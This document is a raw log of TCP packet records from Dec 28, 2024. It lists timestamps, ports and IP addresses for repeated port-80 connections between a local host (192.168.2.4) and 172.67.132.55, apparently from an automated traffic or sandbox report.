Dec 28, 2024 22:19:35.281841040 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.713674068 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.761172056 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.833739042 CET	80	49845	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:35.834115028 CET	49845	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.880718946 CET	80	49848	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:35.880872011 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:35.881010056 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.000458956 CET	80	49848	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:36.235052109 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.354888916 CET	80	49848	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:36.704679012 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.705111027 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.824305058 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.824728012 CET	80	49848	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:36.824750900 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:36.824798107 CET	49848	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.824829102 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.824906111 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.944060087 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:36.944118023 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.944205999 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:36.944310904 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:37.063669920 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:37.172544956 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:37.292032003 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:37.292160034 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:37.297627926 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:37.417311907 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.001116037 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.047461987 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.121157885 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.172518969 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.254249096 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.297466993 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.378367901 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.423151016 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.870479107 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.870563984 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.871212006 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.990386963 CET	80	49852	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.990459919 CET	49852	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.990696907 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:38.990761995 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:38.990891933 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:39.017848969 CET	80	49853	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:39.017940998 CET	49853	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:39.110393047 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:39.344674110 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:39.464174032 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.121346951 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.172476053 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.366265059 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.422504902 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.498743057 CET	49754	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.499025106 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.499917030 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.619111061 CET	80	49859	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.619149923 CET	49859	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.619410992 CET	80	49864	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.619534016 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.619636059 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:40.739092112 CET	80	49864	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:40.969598055 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:41.089945078 CET	80	49864	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:41.750865936 CET	80	49864	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:41.797468901 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:41.993144989 CET	80	49864	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:42.047509909 CET	49864	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:42.106129885 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:42.225713968 CET	80	49868	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:42.225785971 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:42.225987911 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:42.345442057 CET	80	49868	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:42.578838110 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:42.700598001 CET	80	49868	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.282571077 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.283099890 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.355341911 CET	80	49868	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.355420113 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.402335882 CET	80	49868	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.402385950 CET	49868	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.402611017 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.402674913 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.402750015 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.403373003 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.523626089 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.524046898 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.524116993 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.524216890 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.643722057 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.756568909 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.875773907 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:43.876167059 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.876213074 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:43.995369911 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:44.487809896 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:44.531892061 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:44.654896975 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:44.703735113 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:44.732793093 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:44.781862974 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:44.903358936 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:44.953739882 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.034888029 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.034945965 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.035621881 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.154819012 CET	80	49872	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:45.155016899 CET	49872	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.155121088 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:45.155189037 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.155226946 CET	80	49873	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:45.155273914 CET	49873	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.155358076 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.274914980 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:45.500721931 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:45.621481895 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:46.331831932 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:46.375616074 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:46.870055914 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:46.870229959 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:46.870276928 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.465167046 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.465904951 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.585208893 CET	80	49878	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:47.585269928 CET	49878	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.585473061 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:47.585535049 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.585906029 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:47.705362082 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:47.938194036 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:48.057806015 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:48.669470072 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:48.719369888 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:48.907744884 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:48.953805923 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.029803991 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.030635118 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.149754047 CET	80	49884	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:49.150062084 CET	80	49886	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:49.150127888 CET	49884	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.150171041 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.151782036 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.271342039 CET	80	49886	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:49.502111912 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:49.621671915 CET	80	49886	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.215890884 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.216713905 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.234761953 CET	80	49886	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.234834909 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.335438013 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.335505962 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.335664988 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.336489916 CET	80	49886	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.336530924 CET	49886	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.435489893 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.455173016 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.556199074 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.556364059 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.556595087 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.676085949 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.688330889 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:50.807866096 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.807945013 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:50.907619953 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:51.027147055 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:51.466079950 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:51.516246080 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:51.687890053 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:51.713170052 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:51.735008955 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:51.766345978 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:51.933137894 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:51.985018015 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.058599949 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.059334993 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.059336901 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.327047110 CET	80	49898	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:52.327178955 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.327507973 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.327795982 CET	80	49892	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:52.327867985 CET	49892	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.329241037 CET	80	49893	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:52.329301119 CET	49893	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.447134018 CET	80	49898	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:52.713556051 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:52.833339930 CET	80	49898	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:53.411609888 CET	80	49898	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:53.453783035 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:53.650232077 CET	80	49898	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:53.703763962 CET	49898	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:53.781280041 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:53.900926113 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:53.901031017 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:53.901196957 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:54.020705938 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:54.251189947 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:54.370925903 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:54.985198021 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:55.031925917 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:55.225785971 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:55.266268969 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.690798044 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.691291094 CET	49910	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.720727921 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.811763048 CET	80	49902	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:56.811830997 CET	49902	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.811928034 CET	80	49910	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:56.811985970 CET	49910	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.841290951 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:56.841345072 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.841365099 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.841443062 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.961040020 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:56.961060047 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:56.961136103 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:56.961308956 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:57.188286066 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:57.344394922 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:57.438144922 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:57.517046928 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:57.517088890 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:57.517102003 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:57.517117023 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:57.517128944 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:57.557930946 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:57.636737108 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:58.006860971 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:58.047513962 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:58.166874886 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:58.219393015 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:58.483939886 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:58.541083097 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:58.715867996 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:58.766568899 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.047909021 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.048038006 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.048676968 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.167915106 CET	80	49911	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:59.167978048 CET	49911	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.168164968 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:59.168230057 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.168260098 CET	80	49912	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:59.168299913 CET	49912	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.168389082 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.287849903 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:19:59.516386032 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:19:59.635921001 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:00.347388029 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:00.391391993 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.598431110 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:00.656961918 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.730361938 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.731405973 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.850168943 CET	80	49918	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:00.850222111 CET	49918	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.850862980 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:00.850955963 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.851124048 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:00.970634937 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:01.203918934 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:01.323548079 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:01.936166048 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:01.985059023 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.181790113 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:02.186003923 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.310870886 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.473568916 CET	80	49926	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:02.473666906 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.473733902 CET	80	49920	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:02.473824978 CET	49920	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.474317074 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.593888998 CET	80	49926	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:02.828917027 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:02.948839903 CET	80	49926	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.173568964 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.174113989 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.293648958 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.293845892 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.294011116 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.296766043 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.339906931 CET	80	49926	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.365128994 CET	80	49926	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.365261078 CET	49926	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.413470984 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.416239977 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.416354895 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.416520119 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.536004066 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.641390085 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.760962963 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.761013031 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:03.766802073 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:03.886377096 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:04.379255056 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:04.423497915 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:04.593836069 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:04.624774933 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:04.641294956 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:04.672559977 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:04.846518040 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:04.891277075 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.093652964 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.093825102 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.098748922 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.213531971 CET	80	49929	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:05.213633060 CET	49929	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.213951111 CET	80	49930	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:05.214003086 CET	49930	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.218261957 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:05.218352079 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.218703985 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.338188887 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:05.563271999 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:05.683659077 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:06.395478964 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:06.438184023 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.646306992 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:06.703782082 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.791186094 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.792037964 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.911245108 CET	80	49934	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:06.911536932 CET	80	49940	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:06.911633968 CET	49934	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.911679029 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:06.999416113 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:07.118999004 CET	80	49940	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:07.352520943 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:07.658741951 CET	80	49940	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:08.042593002 CET	80	49940	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:08.094412088 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.285207033 CET	80	49940	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:08.328809977 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.403707027 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.523288965 CET	80	49945	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:08.523520947 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.523710966 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.643153906 CET	80	49945	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:08.875834942 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:08.995492935 CET	80	49945	172.67.132.55	192.168.2.4
